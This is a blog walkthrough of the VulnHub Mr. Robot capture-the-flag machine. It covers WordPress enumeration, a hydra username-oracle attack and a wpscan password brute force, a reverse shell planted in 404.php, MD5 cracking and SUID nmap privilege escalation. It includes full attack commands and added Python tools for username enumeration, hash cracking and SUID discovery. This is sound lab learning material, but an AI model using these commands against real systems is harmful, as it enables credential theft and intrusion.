VulnHub’s Mr. Robot: A Walkthrough

Noel Varghese
6 min read · Dec 28, 2021


This is a medium-rated Linux box created by Leon Johnson. Massive thanks to him, as I had a great learning curve on this box and learned new things along the way.

Let’s start hacking, shall we?

Reconnaissance

netdiscover gives us the IP of the target: 192.168.43.185

The Nmap scan results are below:-

Heading over to port 80, we get the following webpage:-

Pretty cool at first glance.

These are the commands we are permitted to run:-

Checking out the page source, we get

You have to experience playing this machine. Phew!

Let’s fuzz for directories, shall we? A dirb scan gives us a lot of them.

Command: dirb http://192.168.43.185

At /0/ we find an empty blog.

All the fuzzed subdirectories look uninteresting, except for /login and /robots.txt (juicy information to get!)

We try attacking the WordPress login with wpscan.

Command: wpscan --url http://192.168.43.185 --enumerate u --disable-tls-checks

wpscan did not yield any user names.

No exploitable plugins were reported either.

We got our nikto scan results too

Exploring each discovered path in turn:-

/favicon.ico, /image, /Image and /images are non-existent pages

I downloaded the favicon.ico image with wget

/login leads us to the wp-login.php page seen earlier

At /phpmyadmin,we get

At /rdf,we get the WP version:-

At /robots.txt, we get:-

As the machine’s description promised, this points us to our first key

Requesting /fsocity.dic directly returns a dictionary (wordlist) file, which we download

Checking key-1-of-3.txt, we get a key:-

Nothing of importance came from the other directories, though /xmlrpc.php was open to POST requests (worth remembering: wpscan can push password guesses through XML-RPC as well as through the login form). We ran a nikto scan to check for an LFI vulnerability.

No vulnerabilities were found.

We ran wpscan with fsocity.dic as the password list. That did not yield any results, so at this point it looked like a decoy WP login with no users.

Enumeration

Let's run dirb again, this time with fsocity.dic as the wordlist. We get the following entries:-

Nothing out of the ordinary, but let’s check them out

We are finally getting somewhere:
/images - Forbidden to enter
/image - See image below
/audio - Forbidden
/video
/blog
/login - The WP login page
/rss - RSS summary download
/Image - Same image as below

None of steghide, stegseek or exiftool could recover a passphrase or any hidden data from the image.

We tried decoding the key from robots.txt, but the decoded text was gibberish.

Consulting Walkthroughs

Unlike the online walkthroughs, I didn't find any message waiting for me at /readme, nor any base64 string at the bottom of the /license.txt

Testing the /wp-login page again with dummy credentials, admin:admin, an error message pops up: “ERROR: Invalid username”

First indicator

Though wpscan did not give us any usernames, this message shows that the login page answers differently for an unknown username than for a wrong password. That difference is a username-enumeration oracle.

We feed fsocity.dic to hydra as a list of usernames with one fixed dummy password, and let the “Invalid username” text act as the failure string: any candidate that does not trigger that error is a real account. fsocity.dic is heavily duplicated (roughly 858k lines, about 11k of them unique), so deduplicating it first cuts the run time drastically.

Command: hydra 192.168.43.185 -L ./fsocity.dic -p test http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" -V -I -f

Explanation of the above command:-

-L ./fsocity.dic: the username list. hydra takes either -l (a single user) or -L (a list), never both; the same rule applies to -p and -P.
-p test: a single fixed password. It can be anything (admin works just as well); we are not guessing passwords yet, only usernames.

^USER^: placeholder hydra replaces with each candidate username from the dictionary

^PASS^: placeholder hydra replaces with the fixed password on every attempt
Eg) admin:test
root:test

F=Invalid username: the failure condition. A response that contains this string is a miss; any response that does not contain it is reported as a hit, which here means “this username exists”, not “this password is right”.

-V: verbose, show each login:password attempt
-I: ignore an existing hydra.restore file instead of waiting to resume from it
-f: stop as soon as the first hit is found

Search results: if you use “admin” as the test password, the ensuing combination hydra reports is:-

elliot:admin

This is not a working credential, only a confirmed username: entering it in WordPress gives the error “The password you entered for the username elliot is incorrect”. The password is wrong, but the username is real.
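The same oracle, written out as an added example (not code from the original walkthrough): each candidate name is sent with a throwaway password, and the two different WordPress error texts decide whether the account exists. The fake responder and the short wordlist at the bottom are constructed so the script runs offline; `make_http_post` builds a real transport with `requests` when pointed at a live host (the URL in the usage comment is hypothetical). Candidates are deduplicated before probing, which is what makes fsocity.dic usable in practice.

```python
"""Username enumeration through the wp-login.php error-message oracle."""
import re
from typing import Callable, Iterable, List

# Error texts WordPress returns for the two cases the oracle distinguishes.
INVALID_USER = re.compile(r"Invalid username", re.I)
WRONG_PASSWORD = re.compile(r"password you entered for the username", re.I)


def classify(body: str) -> str:
    """Turn a wp-login.php response body into an oracle verdict."""
    if INVALID_USER.search(body):
        return "no_such_user"
    if WRONG_PASSWORD.search(body):
        return "user_exists"
    # No error text at all: a real login, a lockout page or a WAF block.
    return "unknown"


def enumerate_users(post: Callable[[str, str], str],
                    candidates: Iterable[str],
                    probe_password: str = "test") -> List[str]:
    """Probe every distinct candidate once and return the confirmed usernames."""
    found, seen = [], set()
    for name in candidates:
        name = name.strip()
        if not name or name in seen:   # wordlists like fsocity.dic are mostly duplicates
            continue
        seen.add(name)
        if classify(post(name, probe_password)) == "user_exists":
            found.append(name)
    return found


def make_http_post(login_url: str) -> Callable[[str, str], str]:
    """Real transport: submits the same form fields hydra does (log, pwd, wp-submit)."""
    import requests  # imported lazily so the offline demo needs no extra package

    def post(username: str, password: str) -> str:
        r = requests.post(login_url,
                          data={"log": username, "pwd": password, "wp-submit": "Log In"},
                          verify=False, timeout=10)
        return r.text
    return post


# --- constructed stand-in for the target, used by the offline demo -----------
_FAKE_USERS = {"elliot"}


def fake_post(username: str, password: str) -> str:
    """Imitates the two wp-login.php error pages for a site with one user."""
    if username.lower() not in _FAKE_USERS:
        return '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    return ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
            f'for the username <strong>{username}</strong> is incorrect.</div>')


SAMPLE_WORDLIST = ["admin", "root", "elliot", "", "elliot", "mrrobot"]  # constructed

if __name__ == "__main__":
    print(enumerate_users(fake_post, SAMPLE_WORDLIST))
    # Against a live box (hypothetical URL; read the wordlist from disk):
    # print(enumerate_users(make_http_post("http://192.168.43.185/wp-login.php"),
    #                       open("fsocity.dic")))
```

The `unknown` verdict is deliberate: a response with neither error text is not automatically a valid login, it may be a lockout or a WAF page, so a real run should log those bodies rather than count them as hits.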

Let’s brute force the password then.

Command: wpscan --url http://192.168.43.185 -U elliot -P FSociety --disable-tls-checks

FSociety: I copied the contents of fsocity.dic into a plain text file called FSociety

Scan results:-

Thank you, God

We get in and try to upload our reverse shell as a plugin, but that was not possible; I tried importing it both as a .zip and as a .php.

So we go to Appearance > Editor and replace the theme’s 404.php with our reverse shell. Make sure to change the IP and port to those of your listener.

Set up a netcat listener and request the following URL. Any page that does not exist is rendered by the theme’s 404.php, so the shell fires:
Command: http://192.168.43.185/404.php

Gaining and Maintaining access

Now we have a bare $ shell with no proper TTY, and we want to escape it into a full interactive shell.
So open vi and, from its command line, run :set shell=/bin/bash followed by :shell (or simply :!/bin/bash); it is the :shell command, not a #!/bin/bash line typed into the buffer, that spawns the new shell.

This is the classic restricted-shell escape through an editor.

In /home/robot, we get the following files:-

We were able to open password.raw-md5, which holds a username and an unsalted MD5 hash.

We now crack the hash. Any online MD5 lookup will do for a CTF box (on a real engagement, crack it offline instead, so the hash is never handed to a third party). We get:-
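An offline wordlist attack on a raw MD5 line, as an added example (not from the original post): it does the same job as an online lookup, locally. The user:hash line below is constructed (the digest is the MD5 of the word "password") and the wordlist is a hypothetical stand-in; on the box you would read the real line from password.raw-md5 and the candidates from fsocity.dic or any other wordlist.

```python
"""Offline wordlist attack on a raw (unsalted) MD5 'user:hash' line."""
import hashlib
import re
from typing import Iterable, Optional, Tuple

SAMPLE_LINE = "robot:5f4dcc3b5aa765d61d8327deb882cf99"   # constructed, not the box's real line
SAMPLE_WORDS = ["123456", "qwerty", "Password", "password", "letmein"]  # constructed wordlist

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_user_hash(line: str) -> Tuple[str, str]:
    """Split 'user:hash' and sanity-check that the hash is a raw MD5 hex digest."""
    user, sep, digest = line.strip().partition(":")
    digest = digest.lower()
    if not sep or not HEX32.match(digest):
        raise ValueError(f"not a user:md5 line: {line!r}")
    return user, digest


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 equals the target, or None.

    Comparison is case-sensitive on the candidate: 'Password' and 'password'
    hash differently, so a wordlist needs both spellings if you want both.
    """
    target = bytes.fromhex(target_hex)
    for word in candidates:
        word = word.rstrip("\r\n")          # tolerate lines read straight from a file
        if hashlib.md5(word.encode("utf-8")).digest() == target:
            return word
    return None


def crack_line(line: str, candidates: Iterable[str]) -> Tuple[str, Optional[str]]:
    """Crack one 'user:hash' line; returns (user, plaintext-or-None)."""
    user, digest = parse_user_hash(line)
    return user, crack_md5(digest, candidates)


if __name__ == "__main__":
    user, pw = crack_line(SAMPLE_LINE, SAMPLE_WORDS)
    print(f"{user}: {pw}")
    # With the real files on the box:
    # with open("password.raw-md5") as f, open("fsocity.dic") as words:
    #     print(crack_line(f.readline(), words))
```

For a single unsalted MD5 this loop is fast enough; for anything bigger, hashcat mode 0 with the same wordlist is the tool, but the parsing and the case-sensitivity caveat are the same.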

We then log in as robot (su - robot) and read key-2-of-3.txt

The robot user is not in the sudoers file, so we couldn't sudo to root, and nothing interesting turned up from find /.

We have to adopt a new technique: look for files with the SUID bit (4000) set, since those execute with their owner’s privileges rather than ours.

Command: find / -perm -4000 -type f 2>/dev/null or
find / -perm -u=s -type f 2>/dev/null
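The same search plus the triage step that follows it, as an added example (not from the original post): walk the filesystem for setuid regular files and strip out the binaries that are setuid on practically every Linux install, so whatever is left (an nmap, a custom helper) is what deserves a look. The KNOWN_BENIGN baseline is an assumption for illustration and is not exhaustive; the demo at the bottom builds a temporary directory instead of scanning /.

```python
"""Find setuid files and separate the expected ones from the odd ones."""
import os
import stat
import tempfile
from typing import Iterable, Iterator, List, Tuple

# Binaries that are setuid on practically every Linux install (assumed baseline).
KNOWN_BENIGN = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn", "gpasswd", "newgrp"}
# Pseudo-filesystems that are noise for this search.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_suid_file(path: str) -> bool:
    """True for a regular file (symlinks excluded) whose setuid bit is set."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root: str = "/", root_owned_only: bool = False) -> Iterator[str]:
    """Yield setuid files under root, the equivalent of `find root -perm -4000 -type f`.

    Pass root_owned_only=True on a real box: a setuid file owned by an
    unprivileged user gains you nothing.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_suid_file(path) and (not root_owned_only or os.lstat(path).st_uid == 0):
                yield path


def triage(paths: Iterable[str]) -> List[str]:
    """Drop the usual suspects; anything left is worth checking against GTFOBins."""
    return sorted(p for p in paths if os.path.basename(p) not in KNOWN_BENIGN)


def build_demo_tree() -> str:
    """Constructed directory: a setuid 'nmap', a setuid 'passwd' and a plain file."""
    d = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("notes.txt", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    return d


def demo() -> Tuple[List[str], List[str]]:
    """Run the finder over the constructed tree: (all setuid names, names left after triage)."""
    d = build_demo_tree()
    hits = list(find_suid(d))
    return (sorted(os.path.basename(p) for p in hits),
            [os.path.basename(p) for p in triage(hits)])


if __name__ == "__main__":
    print(demo())
    # On a real box:
    # print(triage(find_suid("/", root_owned_only=True)))
```

The triage list is the point: a bare list of thirty setuid files is easy to skim past, whereas a list of one or two unexpected entries is what leads straight to the privilege-escalation step.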

Privilege Escalation

The SUID binary that stands out is nmap. Nmap versions 2.02 through 5.21 offer an interactive mode (--interactive) from which shell commands can be executed, and because the binary is setuid root on this machine, those commands run as root. The nmap installed here falls inside that range.

Using this interactive mode, we run commands on the shell as root.

Our flag:-

Reporting

Well, you have it now!

What I learned:-

  • New methods of enumeration, using WPScan

Conclusion:-

  • Privilege Escalation was a piece of cake

Thanks for reading this blog entry and making it all the way here. Until next time, there must be some vulnerable boxes out there for me to pwn……

Written by Noel Varghese

Threat Researcher at CloudSEK Security+ | eJPT | Connect with me on LinkedIn — https://www.linkedin.com/in/noel--varghese
